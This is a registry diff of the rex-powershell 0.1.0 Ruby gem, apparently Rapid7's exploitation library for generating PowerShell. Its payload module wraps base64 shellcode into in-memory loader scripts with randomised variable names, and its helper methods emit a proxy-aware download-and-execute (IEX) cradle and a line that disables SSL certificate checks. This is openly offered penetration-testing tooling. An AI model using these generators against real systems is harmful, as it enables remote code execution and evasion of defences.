rex-powershell 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +52 -0
- data/Gemfile +4 -0
- data/LICENSE +27 -0
- data/README.md +32 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/lib/rex/powershell.rb +71 -0
- data/lib/rex/powershell/command.rb +359 -0
- data/lib/rex/powershell/function.rb +61 -0
- data/lib/rex/powershell/obfu.rb +96 -0
- data/lib/rex/powershell/output.rb +157 -0
- data/lib/rex/powershell/param.rb +21 -0
- data/lib/rex/powershell/parser.rb +182 -0
- data/lib/rex/powershell/payload.rb +78 -0
- data/lib/rex/powershell/psh_methods.rb +93 -0
- data/lib/rex/powershell/script.rb +96 -0
- data/lib/rex/powershell/version.rb +5 -0
- data/rex-powershell.gemspec +27 -0
- metadata +213 -0
- metadata.gz.sig +0 -0
@@ -0,0 +1,78 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
require 'rex/random_identifier'
|
3
|
+
|
4
|
+
module Rex
|
5
|
+
module Powershell
|
6
|
+
module Payload
|
7
|
+
|
8
|
+
def self.read_replace_script_template(template_path, filename, hash_sub)
|
9
|
+
template_pathname = File.join(template_path, filename)
|
10
|
+
template = ''
|
11
|
+
File.open(template_pathname, "rb") {|f| template = f.read}
|
12
|
+
template % hash_sub
|
13
|
+
end
|
14
|
+
|
15
|
+
def self.to_win32pe_psh_net(template_path, code)
|
16
|
+
rig = Rex::RandomIdentifier::Generator.new()
|
17
|
+
rig.init_var(:var_code)
|
18
|
+
rig.init_var(:var_kernel32)
|
19
|
+
rig.init_var(:var_baseaddr)
|
20
|
+
rig.init_var(:var_threadHandle)
|
21
|
+
rig.init_var(:var_output)
|
22
|
+
rig.init_var(:var_codeProvider)
|
23
|
+
rig.init_var(:var_compileParams)
|
24
|
+
rig.init_var(:var_syscode)
|
25
|
+
rig.init_var(:var_temp)
|
26
|
+
|
27
|
+
hash_sub = rig.to_h
|
28
|
+
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
|
29
|
+
|
30
|
+
read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
31
|
+
end
|
32
|
+
|
33
|
+
def self.to_win32pe_psh(template_path, code)
|
34
|
+
hash_sub = {}
|
35
|
+
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
|
36
|
+
hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
|
37
|
+
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
|
38
|
+
hash_sub[:var_size] = Rex::Text.rand_text_alpha(rand(8)+8)
|
39
|
+
hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
|
40
|
+
hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
41
|
+
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
42
|
+
|
43
|
+
hash_sub[:shellcode] = Rex::Powershell.to_powershell(code, hash_sub[:var_code])
|
44
|
+
|
45
|
+
read_replace_script_template(template_path, "to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
46
|
+
end
|
47
|
+
|
48
|
+
#
|
49
|
+
# Reflection technique prevents the temporary .cs file being created for the .NET compiler
|
50
|
+
# Tweaked by shellster
|
51
|
+
# Originally from PowerSploit
|
52
|
+
#
|
53
|
+
def self.to_win32pe_psh_reflection(template_path, code)
|
54
|
+
# Intialize rig and value names
|
55
|
+
rig = Rex::RandomIdentifier::Generator.new()
|
56
|
+
rig.init_var(:func_get_proc_address)
|
57
|
+
rig.init_var(:func_get_delegate_type)
|
58
|
+
rig.init_var(:var_code)
|
59
|
+
rig.init_var(:var_module)
|
60
|
+
rig.init_var(:var_procedure)
|
61
|
+
rig.init_var(:var_unsafe_native_methods)
|
62
|
+
rig.init_var(:var_parameters)
|
63
|
+
rig.init_var(:var_return_type)
|
64
|
+
rig.init_var(:var_type_builder)
|
65
|
+
rig.init_var(:var_buffer)
|
66
|
+
rig.init_var(:var_hthread)
|
67
|
+
|
68
|
+
hash_sub = rig.to_h
|
69
|
+
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
|
70
|
+
|
71
|
+
read_replace_script_template(template_path,
|
72
|
+
"to_mem_pshreflection.ps1.template",
|
73
|
+
hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
74
|
+
end
|
75
|
+
|
76
|
+
end
|
77
|
+
end
|
78
|
+
end
|
@@ -0,0 +1,93 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
module Rex
|
4
|
+
module Powershell
|
5
|
+
##
|
6
|
+
# Convenience methods for generating powershell code in Ruby
|
7
|
+
##
|
8
|
+
|
9
|
+
module PshMethods
|
10
|
+
#
|
11
|
+
# Download file via .NET WebClient
|
12
|
+
#
|
13
|
+
# @param src [String] URL to the file
|
14
|
+
# @param target [String] Location to save the file
|
15
|
+
#
|
16
|
+
# @return [String] Powershell code to download a file
|
17
|
+
def self.download(src, target)
|
18
|
+
target ||= '$pwd\\' << src.split('/').last
|
19
|
+
%Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
|
20
|
+
end
|
21
|
+
|
22
|
+
#
|
23
|
+
# Uninstall app, or anything named like app
|
24
|
+
#
|
25
|
+
# @param app [String] Name of application
|
26
|
+
# @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
|
27
|
+
# the application name
|
28
|
+
#
|
29
|
+
# @return [String] Powershell code to uninstall an application
|
30
|
+
def self.uninstall(app, fuzzy = true)
|
31
|
+
match = fuzzy ? '-like' : '-eq'
|
32
|
+
%Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
|
33
|
+
end
|
34
|
+
|
35
|
+
#
|
36
|
+
# Create secure string from plaintext
|
37
|
+
#
|
38
|
+
# @param str [String] String to create as a SecureString
|
39
|
+
#
|
40
|
+
# @return [String] Powershell code to create a SecureString
|
41
|
+
def self.secure_string(str)
|
42
|
+
%Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$)
|
43
|
+
end
|
44
|
+
|
45
|
+
#
|
46
|
+
# Find PID of file lock owner
|
47
|
+
#
|
48
|
+
# @param filename [String] Filename
|
49
|
+
#
|
50
|
+
# @return [String] Powershell code to identify the PID of a file
|
51
|
+
# lock owner
|
52
|
+
def self.who_locked_file(filename)
|
53
|
+
%Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
|
54
|
+
end
|
55
|
+
|
56
|
+
#
|
57
|
+
# Return last time of login
|
58
|
+
#
|
59
|
+
# @param user [String] Username
|
60
|
+
#
|
61
|
+
# @return [String] Powershell code to return the last time of a user
|
62
|
+
# login
|
63
|
+
def self.get_last_login(user)
|
64
|
+
%Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
|
65
|
+
end
|
66
|
+
|
67
|
+
#
|
68
|
+
# Disable SSL Certificate verification
|
69
|
+
#
|
70
|
+
# @return [String] Powershell code to disable SSL verification
|
71
|
+
# checks.
|
72
|
+
def self.ignore_ssl_certificate
|
73
|
+
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
74
|
+
end
|
75
|
+
|
76
|
+
#
|
77
|
+
# Use the default system web proxy and credentials to download a URL
|
78
|
+
# as a string and execute the contents as PowerShell
|
79
|
+
#
|
80
|
+
# @param url [String] string to download
|
81
|
+
#
|
82
|
+
# @return [String] PowerShell code to download a URL
|
83
|
+
def self.proxy_aware_download_and_exec_string(url)
|
84
|
+
var = Rex::Text.rand_text_alpha(1)
|
85
|
+
cmd = "$#{var}=new-object net.webclient;"
|
86
|
+
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
87
|
+
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
88
|
+
cmd << "IEX $#{var}.downloadstring('#{url}');"
|
89
|
+
cmd
|
90
|
+
end
|
91
|
+
end
|
92
|
+
end
|
93
|
+
end
|
@@ -0,0 +1,96 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'forwardable'
|
4
|
+
|
5
|
+
module Rex
|
6
|
+
module Powershell
|
7
|
+
class Script
|
8
|
+
attr_accessor :code
|
9
|
+
attr_reader :functions, :rig
|
10
|
+
|
11
|
+
include Output
|
12
|
+
include Parser
|
13
|
+
include Obfu
|
14
|
+
# Pretend we are actually a string
|
15
|
+
extend ::Forwardable
|
16
|
+
# In case someone messes with String we delegate based on its instance methods
|
17
|
+
# eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
|
18
|
+
def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
|
19
|
+
:!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub, :dump, :match, :to_sym,
|
20
|
+
:enum_for, :display, :tr_s!, :freeze, :gsub!, :split, :rindex, :<<, :<=>, :+, :lstrip!,
|
21
|
+
:encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
|
22
|
+
:each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
|
23
|
+
:!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
|
24
|
+
:delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
|
25
|
+
:hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
|
26
|
+
:<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
|
27
|
+
:between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
|
28
|
+
:tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
|
29
|
+
:initialize_clone, :to_str, :to_enum, :tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
|
30
|
+
:[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
|
31
|
+
:end_with?
|
32
|
+
|
33
|
+
def initialize(code)
|
34
|
+
@code = ''
|
35
|
+
@rig = Rex::RandomIdentifier::Generator.new
|
36
|
+
|
37
|
+
begin
|
38
|
+
# Open code file for reading
|
39
|
+
fd = ::File.new(code || '', 'rb')
|
40
|
+
while (line = fd.gets)
|
41
|
+
@code << line
|
42
|
+
end
|
43
|
+
|
44
|
+
# Close open file
|
45
|
+
fd.close
|
46
|
+
rescue Errno::ENAMETOOLONG, Errno::ENOENT
|
47
|
+
# Treat code as a... code
|
48
|
+
@code = code.to_s.dup # in case we're eating another script
|
49
|
+
end
|
50
|
+
@functions = get_func_names.map { |f| get_func(f) }
|
51
|
+
end
|
52
|
+
|
53
|
+
##
|
54
|
+
# Class methods
|
55
|
+
##
|
56
|
+
|
57
|
+
#
|
58
|
+
# Convert binary to byte array, read from file if able
|
59
|
+
#
|
60
|
+
# @param input_data [String] Path to powershell file or powershell
|
61
|
+
# code string
|
62
|
+
# @param var_name [String] Byte array variable name
|
63
|
+
#
|
64
|
+
# @return [String] input_data as a powershell byte array
|
65
|
+
def self.to_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3) + 3))
|
66
|
+
# File will raise an exception if the path contains null byte
|
67
|
+
if input_data.include? "\x00"
|
68
|
+
code = input_data
|
69
|
+
else
|
70
|
+
code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
|
71
|
+
end
|
72
|
+
|
73
|
+
code = code.unpack('C*')
|
74
|
+
psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
|
75
|
+
lines = []
|
76
|
+
1.upto(code.length - 1) do |byte|
|
77
|
+
if (byte % 10 == 0)
|
78
|
+
lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
|
79
|
+
else
|
80
|
+
lines.push ",0x#{code[byte].to_s(16)}"
|
81
|
+
end
|
82
|
+
end
|
83
|
+
|
84
|
+
psh << lines.join('') + "\r\n"
|
85
|
+
end
|
86
|
+
|
87
|
+
#
|
88
|
+
# Return list of code modifier methods
|
89
|
+
#
|
90
|
+
# @return [Array] Code modifiers
|
91
|
+
def self.code_modifiers
|
92
|
+
instance_methods.select { |m| m =~ /^(strip|sub)/ }
|
93
|
+
end
|
94
|
+
end # class Script
|
95
|
+
end
|
96
|
+
end
|
@@ -0,0 +1,27 @@
|
|
1
|
+
# coding: utf-8
|
2
|
+
lib = File.expand_path('../lib', __FILE__)
|
3
|
+
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
|
4
|
+
require 'rex/powershell/version'
|
5
|
+
|
6
|
+
Gem::Specification.new do |spec|
|
7
|
+
spec.name = "rex-powershell"
|
8
|
+
spec.version = Rex::Powershell::VERSION
|
9
|
+
spec.authors = ["David 'thelightcosine' Maloney"]
|
10
|
+
spec.email = ["DMaloney@rapid7.com"]
|
11
|
+
|
12
|
+
spec.summary = %q{Rex Powershell Utilities}
|
13
|
+
spec.description = %q{Ruby Exploitation(Rex) library for generating/manipulating Powershell scripts}
|
14
|
+
spec.homepage = "https://github.com/rapid7/rex-powershell"
|
15
|
+
|
16
|
+
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
|
17
|
+
spec.bindir = "exe"
|
18
|
+
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
|
19
|
+
spec.require_paths = ["lib"]
|
20
|
+
|
21
|
+
spec.add_development_dependency "bundler", "~> 1.12"
|
22
|
+
spec.add_development_dependency "rake", "~> 10.0"
|
23
|
+
spec.add_development_dependency "rspec", "~> 3.0"
|
24
|
+
|
25
|
+
spec.add_runtime_dependency 'rex-text'
|
26
|
+
spec.add_runtime_dependency 'rex-random_identifier'
|
27
|
+
end
|
metadata
ADDED
@@ -0,0 +1,213 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: rex-powershell
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.1.0
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- David 'thelightcosine' Maloney
|
8
|
+
autorequire:
|
9
|
+
bindir: exe
|
10
|
+
cert_chain:
|
11
|
+
- |
|
12
|
+
-----BEGIN CERTIFICATE-----
|
13
|
+
MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
|
14
|
+
A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
|
15
|
+
b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
|
16
|
+
MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
|
17
|
+
YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
|
18
|
+
aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
|
19
|
+
jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
|
20
|
+
xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
|
21
|
+
1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
|
22
|
+
snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
|
23
|
+
U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
|
24
|
+
9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
|
25
|
+
BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
|
26
|
+
AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
|
27
|
+
yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
|
28
|
+
38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
|
29
|
+
AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
|
30
|
+
DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
|
31
|
+
HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
|
32
|
+
-----END CERTIFICATE-----
|
33
|
+
- |
|
34
|
+
-----BEGIN CERTIFICATE-----
|
35
|
+
MIIEKDCCAxCgAwIBAgILBAAAAAABL07hNVwwDQYJKoZIhvcNAQEFBQAwVzELMAkG
|
36
|
+
A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
|
37
|
+
b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0xMTA0MTMxMDAw
|
38
|
+
MDBaFw0xOTA0MTMxMDAwMDBaMFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
|
39
|
+
YWxTaWduIG52LXNhMScwJQYDVQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENB
|
40
|
+
IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCyTxTnEL7XJnKr
|
41
|
+
NpfvU79ChF5Y0Yoo/ENGb34oRFALdV0A1zwKRJ4gaqT3RUo3YKNuPxL6bfq2RsNq
|
42
|
+
o7gMJygCVyjRUPdhOVW4w+ElhlI8vwUd17Oa+JokMUnVoqni05GrPjxz7/Yp8cg1
|
43
|
+
0DB7f06SpQaPh+LO9cFjZqwYaSrBXrta6G6V/zuAYp2Zx8cvZtX9YhqCVVrG+kB3
|
44
|
+
jskwPBvw8jW4bFmc/enWyrRAHvcEytFnqXTjpQhU2YM1O46MIwx1tt6GSp4aPgpQ
|
45
|
+
STic0qiQv5j6yIwrJxF+KvvO3qmuOJMi+qbs+1xhdsNE1swMfi9tBoCidEC7tx/0
|
46
|
+
O9dzVB/zAgMBAAGjgfowgfcwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYB
|
47
|
+
Af8CAQAwHQYDVR0OBBYEFAhu2Lacir/tPtfDdF3MgB+oL1B6MEcGA1UdIARAMD4w
|
48
|
+
PAYEVR0gADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNv
|
49
|
+
bS9yZXBvc2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2Jh
|
50
|
+
bHNpZ24ubmV0L3Jvb3QuY3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMDMB8GA1UdIwQY
|
51
|
+
MBaAFGB7ZhpFDZfKiVAvfQTNNKj//P1LMA0GCSqGSIb3DQEBBQUAA4IBAQAiXMXd
|
52
|
+
PfQLcNjj9efFjgkBu7GWNlxaB63HqERJUSV6rg2kGTuSnM+5Qia7O2yX58fOEW1o
|
53
|
+
kdqNbfFTTVQ4jGHzyIJ2ab6BMgsxw2zJniAKWC/wSP5+SAeq10NYlHNUBDGpeA07
|
54
|
+
jLBwwT1+170vKsPi9Y8MkNxrpci+aF5dbfh40r5JlR4VeAiR+zTIvoStvODG3Rjb
|
55
|
+
88rwe8IUPBi4A7qVPiEeP2Bpen9qA56NSvnwKCwwhF7sJnJCsW3LZMMSjNaES2dB
|
56
|
+
fLEDF3gJ462otpYtpH6AA0+I98FrWkYVzSwZi9hwnOUtSYhgcqikGVJwQ17a1kYD
|
57
|
+
sGgOJO9K9gslJO8k
|
58
|
+
-----END CERTIFICATE-----
|
59
|
+
- |
|
60
|
+
-----BEGIN CERTIFICATE-----
|
61
|
+
MIIEyjCCA7KgAwIBAgISESEyE8rNriS4+1dc8jOHEUL8MA0GCSqGSIb3DQEBBQUA
|
62
|
+
MFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMScwJQYD
|
63
|
+
VQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENBIC0gRzIwHhcNMTMxMDExMTUx
|
64
|
+
NTM4WhcNMTYxMDExMTUxNTM4WjBgMQswCQYDVQQGEwJVUzEWMBQGA1UECBMNTWFz
|
65
|
+
c2FjaHVzZXR0czEPMA0GA1UEBxMGQm9zdG9uMRMwEQYDVQQKEwpSYXBpZDcgTExD
|
66
|
+
MRMwEQYDVQQDEwpSYXBpZDcgTExDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
|
67
|
+
CgKCAQEAhD//7+739c69hssg0mD6CXgf2JkuWTcU81dgD7aKcoEPqU8e1FseBvDW
|
68
|
+
/Q5fNK2H2NgHV/Msn18zXuK0PkaJXqj/vDsuKB3Hq0BiR2AwyDdEw8K5MK5bgQc2
|
69
|
+
tmcVtEAejRoy1Uv5UyfaAYAxG6zsma3buV1fjnEAC3VouRg4+EX/f65H/a6srntK
|
70
|
+
5Etp3D71k2f0oUl8dOqOmSsRJQQ5zSs4ktDvpjAmsvzoA+1svceLYU95mvQsIw2T
|
71
|
+
edpmibGMwGw/HmgV+YWBgF5UGvax6zbC2i6DF2YHnDfkNb8/1MEIaxOTAbJTazTK
|
72
|
+
8laCQOyay6L1BNPQKjZBgOge8LZq1wIDAQABo4IBizCCAYcwDgYDVR0PAQH/BAQD
|
73
|
+
AgeAMEwGA1UdIARFMEMwQQYJKwYBBAGgMgEyMDQwMgYIKwYBBQUHAgEWJmh0dHBz
|
74
|
+
Oi8vd3d3Lmdsb2JhbHNpZ24uY29tL3JlcG9zaXRvcnkvMAkGA1UdEwQCMAAwEwYD
|
75
|
+
VR0lBAwwCgYIKwYBBQUHAwMwPgYDVR0fBDcwNTAzoDGgL4YtaHR0cDovL2NybC5n
|
76
|
+
bG9iYWxzaWduLmNvbS9ncy9nc2NvZGVzaWduZzIuY3JsMIGGBggrBgEFBQcBAQR6
|
77
|
+
MHgwQAYIKwYBBQUHMAKGNGh0dHA6Ly9zZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2Fj
|
78
|
+
ZXJ0L2dzY29kZXNpZ25nMi5jcnQwNAYIKwYBBQUHMAGGKGh0dHA6Ly9vY3NwMi5n
|
79
|
+
bG9iYWxzaWduLmNvbS9nc2NvZGVzaWduZzIwHQYDVR0OBBYEFE536JwFx9SpaEi3
|
80
|
+
w8pcq2GRFA5BMB8GA1UdIwQYMBaAFAhu2Lacir/tPtfDdF3MgB+oL1B6MA0GCSqG
|
81
|
+
SIb3DQEBBQUAA4IBAQAGpGXHtFLjTTivV+xQPwtZhfPuJ7f+VGTMSAAYWmfzyHXM
|
82
|
+
YMFYUWJzSFcuVR2YfxtbS45P7U5Qopd7jBQ0Ygk5h2a+B5nE4+UlhHj665d0zpYM
|
83
|
+
1eWndMaO6WBOYnqtNyi8Dqqc1foKZDNHEDggYhGso7OIBunup+N4sPL9PwQ3eYe6
|
84
|
+
mUu8z0E4GXYViaMPOFkqaYnoYgf2L+7L5zKYT4h/NE/P7kj7EbduHgy/v/aAIrNl
|
85
|
+
2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
|
86
|
+
QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
|
87
|
+
-----END CERTIFICATE-----
|
88
|
+
date: 2016-06-21 00:00:00.000000000 Z
|
89
|
+
dependencies:
|
90
|
+
- !ruby/object:Gem::Dependency
|
91
|
+
name: bundler
|
92
|
+
requirement: !ruby/object:Gem::Requirement
|
93
|
+
requirements:
|
94
|
+
- - "~>"
|
95
|
+
- !ruby/object:Gem::Version
|
96
|
+
version: '1.12'
|
97
|
+
type: :development
|
98
|
+
prerelease: false
|
99
|
+
version_requirements: !ruby/object:Gem::Requirement
|
100
|
+
requirements:
|
101
|
+
- - "~>"
|
102
|
+
- !ruby/object:Gem::Version
|
103
|
+
version: '1.12'
|
104
|
+
- !ruby/object:Gem::Dependency
|
105
|
+
name: rake
|
106
|
+
requirement: !ruby/object:Gem::Requirement
|
107
|
+
requirements:
|
108
|
+
- - "~>"
|
109
|
+
- !ruby/object:Gem::Version
|
110
|
+
version: '10.0'
|
111
|
+
type: :development
|
112
|
+
prerelease: false
|
113
|
+
version_requirements: !ruby/object:Gem::Requirement
|
114
|
+
requirements:
|
115
|
+
- - "~>"
|
116
|
+
- !ruby/object:Gem::Version
|
117
|
+
version: '10.0'
|
118
|
+
- !ruby/object:Gem::Dependency
|
119
|
+
name: rspec
|
120
|
+
requirement: !ruby/object:Gem::Requirement
|
121
|
+
requirements:
|
122
|
+
- - "~>"
|
123
|
+
- !ruby/object:Gem::Version
|
124
|
+
version: '3.0'
|
125
|
+
type: :development
|
126
|
+
prerelease: false
|
127
|
+
version_requirements: !ruby/object:Gem::Requirement
|
128
|
+
requirements:
|
129
|
+
- - "~>"
|
130
|
+
- !ruby/object:Gem::Version
|
131
|
+
version: '3.0'
|
132
|
+
- !ruby/object:Gem::Dependency
|
133
|
+
name: rex-text
|
134
|
+
requirement: !ruby/object:Gem::Requirement
|
135
|
+
requirements:
|
136
|
+
- - ">="
|
137
|
+
- !ruby/object:Gem::Version
|
138
|
+
version: '0'
|
139
|
+
type: :runtime
|
140
|
+
prerelease: false
|
141
|
+
version_requirements: !ruby/object:Gem::Requirement
|
142
|
+
requirements:
|
143
|
+
- - ">="
|
144
|
+
- !ruby/object:Gem::Version
|
145
|
+
version: '0'
|
146
|
+
- !ruby/object:Gem::Dependency
|
147
|
+
name: rex-random_identifier
|
148
|
+
requirement: !ruby/object:Gem::Requirement
|
149
|
+
requirements:
|
150
|
+
- - ">="
|
151
|
+
- !ruby/object:Gem::Version
|
152
|
+
version: '0'
|
153
|
+
type: :runtime
|
154
|
+
prerelease: false
|
155
|
+
version_requirements: !ruby/object:Gem::Requirement
|
156
|
+
requirements:
|
157
|
+
- - ">="
|
158
|
+
- !ruby/object:Gem::Version
|
159
|
+
version: '0'
|
160
|
+
description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
|
161
|
+
scripts
|
162
|
+
email:
|
163
|
+
- DMaloney@rapid7.com
|
164
|
+
executables: []
|
165
|
+
extensions: []
|
166
|
+
extra_rdoc_files: []
|
167
|
+
files:
|
168
|
+
- ".gitignore"
|
169
|
+
- ".rspec"
|
170
|
+
- ".travis.yml"
|
171
|
+
- CODE_OF_CONDUCT.md
|
172
|
+
- Gemfile
|
173
|
+
- LICENSE
|
174
|
+
- README.md
|
175
|
+
- Rakefile
|
176
|
+
- bin/console
|
177
|
+
- bin/setup
|
178
|
+
- lib/rex/powershell.rb
|
179
|
+
- lib/rex/powershell/command.rb
|
180
|
+
- lib/rex/powershell/function.rb
|
181
|
+
- lib/rex/powershell/obfu.rb
|
182
|
+
- lib/rex/powershell/output.rb
|
183
|
+
- lib/rex/powershell/param.rb
|
184
|
+
- lib/rex/powershell/parser.rb
|
185
|
+
- lib/rex/powershell/payload.rb
|
186
|
+
- lib/rex/powershell/psh_methods.rb
|
187
|
+
- lib/rex/powershell/script.rb
|
188
|
+
- lib/rex/powershell/version.rb
|
189
|
+
- rex-powershell.gemspec
|
190
|
+
homepage: https://github.com/rapid7/rex-powershell
|
191
|
+
licenses: []
|
192
|
+
metadata: {}
|
193
|
+
post_install_message:
|
194
|
+
rdoc_options: []
|
195
|
+
require_paths:
|
196
|
+
- lib
|
197
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
198
|
+
requirements:
|
199
|
+
- - ">="
|
200
|
+
- !ruby/object:Gem::Version
|
201
|
+
version: '0'
|
202
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
203
|
+
requirements:
|
204
|
+
- - ">="
|
205
|
+
- !ruby/object:Gem::Version
|
206
|
+
version: '0'
|
207
|
+
requirements: []
|
208
|
+
rubyforge_project:
|
209
|
+
rubygems_version: 2.4.8
|
210
|
+
signing_key:
|
211
|
+
specification_version: 4
|
212
|
+
summary: Rex Powershell Utilities
|
213
|
+
test_files: []
|